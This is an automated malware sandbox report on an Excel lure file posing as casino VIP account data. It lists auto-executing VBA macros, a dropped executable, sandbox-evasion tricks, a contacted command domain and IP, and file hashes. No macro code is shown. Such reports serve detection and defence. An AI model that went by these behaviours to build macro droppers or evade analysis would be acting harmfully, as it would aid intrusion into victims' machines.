Analysis Report
Overview
General Information |
|---|
| Joe Sandbox Version: | 18.0.0 |
| Analysis ID: | 236725 |
| Start time: | 10:20:06 |
| Joe Sandbox Product: | Cloud |
| Start date: | 12.03.2017 |
| Overall analysis duration: | 0h 4m 19s |
| Report type: | full |
| Sample file name: | LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls |
| Cookbook file name: | defaultwindowsofficecookbook.jbs |
| Analysis system description: | Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43) |
| Number of analysed new started processes analysed: | 8 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies |
|
| Detection: | MAL |
| Classification: | mal60.evad.expl.winXLS@9/8@1/2 |
| HCA Information: |
|
| EGA Information: | Failed |
| Cookbook Comments: |
|
| Warnings: | Show All
|
Detection |
|---|
| Strategy | Score | Range | Reporting | Detection | |
|---|---|---|---|---|---|
| Threshold | 60 | 0 - 100 | Report FP / FN | ||
Confidence |
|---|
| Strategy | Score | Range | Further Analysis Required? | Confidence | |
|---|---|---|---|---|---|
| Threshold | 5 | 0 - 5 | false | ||
Classification |
|---|
Analysis Advice |
|---|
| Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation |
| Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
| Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
| Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine |
| Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis |
Signature Overview |
|---|
Click to jump to signature section
Software Vulnerabilities: |
|---|
| Potential document exploit detected (performs DNS queries) | Show sources | ||
| Source: global traffic | DNS query: | ||
| Potential document exploit detected (performs HTTP gets) | Show sources | ||
| Source: global traffic | TCP traffic: | ||
| Potential document exploit detected (unknown TCP traffic) | Show sources | ||
| Source: global traffic | TCP traffic: | ||
| Document exploit detected (process start blacklist hit) | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: | ||
Networking: |
|---|
| Downloads files from webservers via HTTP | Show sources | ||
| Source: global traffic | HTTP traffic detected: | ||
| Found strings which match to known social media urls | Show sources | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Performs DNS lookups | Show sources | ||
| Source: unknown | DNS traffic detected: | ||
| Urls found in memory or binary data | Show sources | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: EXCEL.EXE, ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: EXCEL.EXE | String found in binary or memory: | ||
| Source: EXCEL.EXE | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: csc.exe | String found in binary or memory: | ||
| Source: EXCEL.EXE | String found in binary or memory: | ||
| Source: EXCEL.EXE | String found in binary or memory: | ||
| Source: EXCEL.EXE | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Source: ez2pft0p9dli.exe | String found in binary or memory: | ||
| Uses HTTPS | Show sources | ||
| Source: unknown | Network traffic detected: | ||
| Source: unknown | Network traffic detected: | ||
| HTTP GET or POST without a user agent | Show sources | ||
| Source: global traffic | HTTP traffic detected: | ||
Persistence and Installation Behavior: |
|---|
| Drops PE files | Show sources | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: | ||
Data Obfuscation: |
|---|
| Compiles C# or VB.Net code | Show sources | ||
| Source: unknown | Process created: | ||
| Source: C:\Windows\System32\cmd.exe | Process created: | ||
| PE file contains an invalid checksum | Show sources | ||
| Source: ez2pft0p9dli.exe.3140.dr | Static PE information: | ||
System Summary: |
|---|
| Checks whether correct version of .NET is installed | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: | ||
| Found graphical window changes (likely an installer) | Show sources | ||
| Source: Window Recorder | Window detected: | ||
| Checks if Microsoft Office is installed | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: | ||
| Uses new MSVCR Dlls | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: | ||
| Binary contains paths to debug symbols | Show sources | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Binary contains paths to development resources | Show sources | ||
| Source: EXCEL.EXE | Binary or memory string: | ||
| Classification label | Show sources | ||
| Source: classification engine | Classification label: | ||
| Creates files inside the user directory | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: | ||
| Creates temporary files | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: | ||
| Document contains an OLE Workbook stream indicating a Microsoft Excel file | Show sources | ||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE indicator, Workbook stream: | ||
| Parts of this applications are using the .NET runtime (Probably coded in C#) | Show sources | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Section loaded: | ||
| Reads ini files | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: | ||
| Reads software policies | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: | ||
| Spawns processes | Show sources | ||
| Source: unknown | Process created: | ||
| Source: unknown | Process created: | ||
| Source: unknown | Process created: | ||
| Source: unknown | Process created: | ||
| Source: unknown | Process created: | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: | ||
| Source: C:\Windows\System32\cmd.exe | Process created: | ||
| Source: C:\Windows\System32\cmd.exe | Process created: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: | ||
| Uses an in-process (OLE) Automation server | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key value queried: | ||
| Document contains embedded VBA macros | Show sources | ||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE indicator, VBA macros: | ||
| PE file does not import any functions | Show sources | ||
| Source: ez2pft0p9dli.exe.3140.dr | Static PE information: | ||
| Reads the hosts file | Show sources | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | File read: | ||
| Tries to load missing DLLs | Show sources | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Section loaded: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Section loaded: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Section loaded: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Section loaded: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Section loaded: | ||
| Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources | ||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen | ||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: Workbook_Open | ||
| Document contains an embedded VBA macro which may execute processes | Show sources | ||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: DGpkkrErsYIk | ||
| Document contains an embedded VBA macro with suspicious strings | Show sources | ||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls | OLE, VBA macro line: | |||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: rpHTVPhPlNzeiOHkGWhPpSxNM | ||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: bRfcoUjl | ||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: AnokPRtKBZYK | ||
| Source: VBA code instrumentation | OLE, VBA macro: | Name: AnokPRtKBZYK | ||
| Document contains an embedded VBA with base64 encoded strings | Show sources | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
| Source: VBA code instrumentation | OLE, VBA macro: | ||
HIPS / PFW / Operating System Protection Evasion: |
|---|
| May try to detect the Windows Explorer process (often used for injection) | Show sources | ||
| Source: cmd.exe, ez2pft0p9dli.exe | Binary or memory string: | ||
| Source: cmd.exe, ez2pft0p9dli.exe | Binary or memory string: | ||
| Source: cmd.exe, ez2pft0p9dli.exe | Binary or memory string: | ||
Anti Debugging: |
|---|
| Creates guard pages, often used to prevent reverse engineering and debugging | Show sources | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Memory allocated: | ||
| Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | System information queried: | ||
Malware Analysis System Evasion: |
|---|
| Found a high number of Window / User specific system calls (may be a loop to detect user behavior) | Show sources | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Window / User API: | ||
| May sleep (evasive loops) to hinder dynamic analysis | Show sources | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe TID: 3168 | Thread sleep time: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe TID: 3224 | Thread sleep count: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe TID: 3224 | Thread sleep time: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe TID: 3256 | Thread sleep count: | ||
Hooking and other Techniques for Hiding and Protection: |
|---|
| Disables application error messsages (SetErrorMode) | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: | ||
| Source: C:\Windows\System32\cmd.exe | Process information set: | ||
| Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Process information set: | ||
| Stores large binary data to the registry | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key value created or modified: | ||
Language, Device and Operating System Detection: |
|---|
| Queries the cryptographic machine GUID | Show sources | ||
| Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key value queried: | ||
| Queries the volume information (name, serial number etc) of a device | Show sources | ||
| Source: C:\Windows\System32\cmd.exe | Queries volume information: | ||
| Source: C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe | Queries volume information: | ||
Behavior Graph |
|---|
Yara Overview |
|---|
| No Yara matches |
|---|
Screenshot |
|---|
Startup |
|---|
|
Created / dropped Files |
|---|
| File Path | Type and Hashes |
|---|---|
| |
| |
| |
| |
| |
| |
| |
|
Contacted Domains/Contacted IPs |
|---|
Contacted Domains |
|---|
| Name | IP | Active |
|---|---|---|
| secure.dropinbox.pw | 200.122.181.26 | true |
Contacted IPs |
|---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Country | Flag | ASN | ASN Name |
|---|---|---|---|---|
| 8.8.8.8 | United States | 15169 | GoogleInc | |
| 200.122.181.26 | Costa Rica | 3790 | RADIOGRAFICACOSTARRICENSE |
Static File Info |
|---|
General | |
|---|---|
| File type: | |
| TrID: |
|
| File name: | LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls |
| File size: | 363520 |
| MD5: | b3e93233bfc939f853257f4f24981dc7 |
| SHA1: | 31ad570cb2003b6cf4fe4ecd464e6385585c9b94 |
| SHA256: | 5025aa0fc6d4ac6daa2d9a6452263dcc20d6906149fc0995d458ed38e7e57b61 |
| SHA512: | 0279eb3f6e0efa4576756f3eacc5e673caf2f5e4fb021ff7aab5be0c5009796bbb8d551a5f93cc0728c83d15803190c436efb0b15671c6ce1c33fe497241ee66 |
| File Content Preview: | ........................>...................................I...................b.......d...................................................................................................................................................................... |
File Icon |
|---|
Static OLE Info |
|---|
General | ||
|---|---|---|
| Document Type: | OLE | |
| Number of OLE Files: | 1 | |
OLE File "LeoVegas 140 VIP Accounts 08-03-2017 Sample.xls" |
|---|
Indicators | |
|---|---|
| Has Summary Info: | True |
| Application Name: | unknown |
| Encrypted Document: | False |
| Contains Word Document Stream: | False |
| Contains Workbook/Book Stream: | True |
| Contains PowerPoint Document Stream: | False |
| Contains Visio Document Stream: | False |
| Contains ObjectPool Stream: | False |
| Flash Objects Count: | 0 |
| Contains VBA Macros: | True |
Summary | |
|---|---|
| Code Page: | 1252 |
| Author: | User |
| Last Saved By: | Martina Hognas |
| Create Time: | 2015-11-16 14:32:16 |
| Last Saved Time: | 2017-03-08 15:10:09 |
| Security: | 0 |
Document Summary | |
|---|---|
| Document Code Page: | 1252 |
| Thumbnail Scaling Desired: | False |
| Contains Dirty Links: | False |
| Shared Document: | False |
| Changed Hyperlinks: | False |
| Application Version: | 1048576 |
Streams with VBA |
|---|
VBA File Name: Class1.cls, Stream Size: 1007 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/Class1 |
| VBA File Name: | Class1.cls |
| Stream Size: | 1007 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . 5 . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 d3 35 fd 5b 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
VBA File Name: Module1.bas, Stream Size: 2480 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/Module1 |
| VBA File Name: | Module1.bas |
| Stream Size: | 2480 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . . . . . . . . . . . . 5 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 01 16 03 00 06 f0 00 00 00 a2 06 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 07 00 00 7a 08 00 00 00 00 00 00 01 00 00 00 d3 35 33 0f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 18 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
VBA File Name: Module3.bas, Stream Size: 12337 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/Module3 |
| VBA File Name: | Module3.bas |
| Stream Size: | 12337 |
| Data ASCII: | . . . . . . . . . r . . . . . . . . . . . . . . . . . . . B " . . . . . . . . . . . 5 _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . |
| Data Raw: | 01 16 03 00 06 f0 00 00 00 72 0d 00 00 d4 00 00 00 d8 01 00 00 ff ff ff ff e6 0d 00 00 42 22 00 00 00 00 00 00 01 00 00 00 d3 35 5f 86 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
VBA File Name: Sheet1.cls, Stream Size: 999 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet1 |
| VBA File Name: | Sheet1.cls |
| Stream Size: | 999 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . 5 . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 d3 35 d9 d1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
VBA File Name: Sheet2.cls, Stream Size: 999 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet2 |
| VBA File Name: | Sheet2.cls |
| Stream Size: | 999 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . 5 . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 d3 35 bd 8c 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
VBA File Name: Sheet3.cls, Stream Size: 999 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet3 |
| VBA File Name: | Sheet3.cls |
| Stream Size: | 999 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . 5 s . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 d3 35 73 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 8268 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/ThisWorkbook |
| VBA File Name: | ThisWorkbook.cls |
| Stream Size: | 8268 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 { . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . % . . . A . } . . > . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . 0 . . . O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . 0 . . . O . . . . . . . . . . . % . . . A . } . . > . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 01 16 03 00 06 00 01 00 00 aa 10 00 00 e4 00 00 00 88 02 00 00 af 11 00 00 bd 11 00 00 b5 1a 00 00 01 00 00 00 01 00 00 00 d3 35 7b b4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 a7 a2 8b 25 f9 be ef 41 b6 7d 11 12 3e a8 d6 f7 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
|---|
|
VBA Code |
|---|
|
Streams |
|---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 107 |
|---|
General | |
|---|---|
| Stream Path: | \x1CompObj |
| File Type: | data |
| Stream Size: | 107 |
| Entropy: | 4.18482950044 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . . |
| Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244 |
|---|
General | |
|---|---|
| Stream Path: | \x5DocumentSummaryInformation |
| File Type: | data |
| Stream Size: | 244 |
| Entropy: | 2.86500736308 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . |
| Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 184 |
|---|
General | |
|---|---|
| Stream Path: | \x5SummaryInformation |
| File Type: | data |
| Stream Size: | 184 |
| Entropy: | 3.35544235989 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . M a r t i n a H o g n a s . . @ . . . . . / . { . . @ . . . . ^ t . . . . . . . . . . . . . |
